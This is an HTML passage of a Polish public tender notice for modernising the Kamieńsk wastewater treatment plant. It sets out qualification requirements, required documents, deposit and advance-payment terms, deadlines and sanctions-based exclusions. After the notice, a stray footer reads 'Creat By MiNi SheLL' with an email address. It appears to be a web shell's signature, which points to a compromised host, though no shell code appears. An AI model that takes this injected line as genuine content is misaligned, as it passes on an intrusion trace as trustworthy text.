uprawnienia<br/>do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych bez ograniczeń określone przepisami ustawy Prawo budowlane,<br/>f) dysponują osobą która pełnić będzie funkcję kierownika robót branży konstrukcyjno - budowlanej posiadającą uprawnienia<br/>do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń określone przepisami<br/>ustawy Prawo budowlane.<br/>Zamawiający informuje, iż dopuszcza łączenie funkcji projektanta z funkcją kierownika robót danej branży pod warunkiem,<br/>że osoba ta posiada uprawnienia wymagane dla<br/>obu tych funkcji.<br/>Wykonawca potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz<br/>z ofertą Oświadczenia własnego, o którym mowa w pkt. 7.1. SWZ.<br/>Uwaga:<br/>Przez ww. uprawnienia budowlane Zamawiający rozumie uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. 2021 r, poz. 2351 ze zm.) lub odpowiadające im ważne uprawnienia budowlane<br/>wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie<br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z<br/>dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii<br/>Europejskiej (t.j. Dz. U. z 2021 r. poz. 1646).<br/>W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw<br/>członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) – stron umowy o Europejskim Obszarze<br/>Gospodarczym (w rozumieniu art. 4a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz<br/>inżynierów budownictwa (t.j. Dz.U. z 2019 r., poz. 1117)), osoby wyznaczone do realizacji zamówienia posiadają<br/>uprawnienia budowlane do kierowania robotami budowlanymi, wyszczególnione wyżej jeżeli:<br/>• nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych<br/>funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień<br/>budowlanych do kierowania robotami budowlanymi, oraz<br/>• posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji<br/>zawodowych zostały spełnione w stosunku do tych osób wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15<br/>grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa, dotyczące świadczenia usług<br/>transgranicznych.<br/>Zamawiający na etapie składania i oceny ofert nie wymaga, aby te osoby poza legitymowaniem się posiadaniem uprawnień<br/>budowlanych zdobytych poza terytorium Polski, musiały dysponować odpowiednią decyzją o uznaniu kwalifikacji<br/>zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych, by spełniły wymagania, o których mowa w<br/>art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa,<br/>dotyczące świadczenia usług transgranicznych, tj. aby uzyskały one tymczasowy wpis na listę członków właściwej izby<br/>samorządu zawodowego.<br/>Na podstawie art. 104 ustawy Prawo budowlane osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia<br/>budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie.<br/>Zakres uprawnień budowlanych będzie odczytany zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące<br/>podstawą ich nadania. W celu uniknięcia wątpliwości zaleca się podanie przez wykonawcę daty wydania uprawnień i<br/>dokładne cytowanie zakresu uprawnień z posiadanego zaświadczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia - nie wymagane.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu:<br/>a) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>b) informacja banku lub spółdzielczej kasy oszczędnościowo – kredytowej potwierdzająca wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem; jeżeli z<br/>uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków dowodowych, o<br/>których mowa w zdaniu pierwszym , wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub<br/>finansowej.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenie o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu zgodnie z<br/>wzorem stanowiącym załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie takie składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>przedstawia, wraz z oświadczeniem, o którym mowa powyżej, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>2) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa, (jeżeli dotyczy), o których mowa<br/>w ust. 11.4-11.7;<br/>3) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, (jeżeli dotyczy). W sytuacji, gdy oferta lub inne dokumenty<br/>składane w toku postępowania będą zawierać tajemnicę przedsiębiorstwa, Wykonawca wraz z przekazaniem takich<br/>informacji, zastrzega, że nie mogą być one udostępniane oraz wskazuje, że zastrzeżone informację stanowią tajemnicę<br/>przedsiębiorstwa w rozumieniu Ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Wykonawca nie może<br/>zastrzec informacji, o których mowa w art. 222 ust 5 ustawy Pzp,<br/>4) zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach innego podmiotu,<br/>5) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli dotyczy),<br/>6) dowody równoważności, jeżeli wykonawca zaoferował rozwiązania równoważne w stosunku do określonych w opisie<br/>przedmiotu zamówienia;<br/>7) dokumenty potwierdzające wniesienie wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga zabezpieczenia oferty wadium. Zamawiający określa kwotę wadium w wysokości 20.000,00 zł.<br/>Wadium wykonawca wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu<br/>związania ofert.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020 r. poz. 299).<br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w esBANK Bank Spółdzielczy<br/>w Radomsku Filia Kamieńsk:<br/>Nr rachunku: 19 8980 0009 2028 0076 5156 0010<br/>z dopiskiem: Wadium – „Modernizacja oczyszczalni ścieków w Kamieńsku”<br/>Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne zostaną uznane na<br/>koncie Zamawiającego przed upływem terminu składnia ofert.<br/>Pozostałe informacje dot. wadium opisane zostały w Rozdziale 9 Specyfikacji Warunków<br/>Zamówienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.7. Wykonawcy wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne/konsorcja)<br/>7.7.1 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia o którym mowa w pkt. 7.1. SWZ składa każdy z wykonawców.<br/>7.7.2 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>7.7.3 W przypadku gdy wykonawcę reprezentuje pełnomocnik wraz z ofertą winno być złożone<br/>pełnomocnictwo dla tej osoby określające jego zakres. Pełnomocnictwo winno być podpisane<br/>przez osoby uprawnione do reprezentowania Wykonawcy.<br/>7.7.4 Pełnomocnictwo do złożenia oferty musi być sporządzone i przekazane Zamawiającemu<br/>zgodnie z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452).<br/>7.7.5 Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający udzieli Wykonawcy zaliczki na poczet wykonania przedmiotu umowy w wysokości 5% wynagrodzenia brutto<br/>Wykonawcy, tj. w wysokości ........ zł. Zaliczka zostanie udzielona Wykonawcy na jego wniosek na podstawie faktury pro<br/>forma przedłożonej przez Wykonawcę.<br/>Wypłata zaliczki nastąpi w terminie 10 dni od dnia otrzymania przez Zamawiającego faktury pro forma.<br/>Udzielona zaliczka zostaje zaliczona, po zrealizowaniu całości Przedmiotu umowy, na poczet wynagrodzenia Wykonawcy.<br/>W przypadku odstąpienia od umowy przez Zamawiającego lub Wykonawcę bądź w przypadku niewykonania przez<br/>Wykonawcę umowy z jakiejkolwiek<br/>przyczyny, zaliczka staje się natychmiast wymagalna i płatna Zamawiającemu przez Wykonawcę w terminie 5 dni roboczych<br/>od dnia otrzymania wezwania do zwrotu nierozliczonej części lub całości zaliczki. Za rozliczenie zaliczki uznaje się wykonanie robót o wartości nie mniejszej niż wartość zaliczki po potwierdzeniu przez Inspektora Nadzoru ich należytego<br/>wykonania. Zamawiający może żądać zwrotu zaliczki niezależnie od przysługującego mu<br/>odszkodowania lub kar umownych. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały szczegółowo opisane w<br/>projektowanych postanowieniach umowy - załącznik nr 6 do Specyfikacji Warunków Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta wraz z załącznikami musi być złożona za pośrednictwem Platformy przetargowej</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-26 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022r poz. 835) z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1.	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2.	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3.	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>Wykluczenie wykonawcy następować będzie na okres trwania ww. okoliczności.<br/>Osoba lub podmiot podlegające wykluczeniu na podstawie okoliczności określonych<br/>w pkt. 4.3. SWZ, które w okresie tego wykluczenia ubiegają się o udzielenie<br/>zamówienia publicznego lub dopuszczenie do udziału w konkursie lub biorą udział w postępowaniu o udzielenie zamówienia publicznego lub w konkursie, podlegają karze pieniężnej. Karę pieniężną, o której mowa w zdaniu poprzednim nakłada Prezes Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł. Wpływy z kar pieniężnych stanowią dochód budżetu państwa.

Creat By MiNi SheLL
Email: jattceo@gmail.com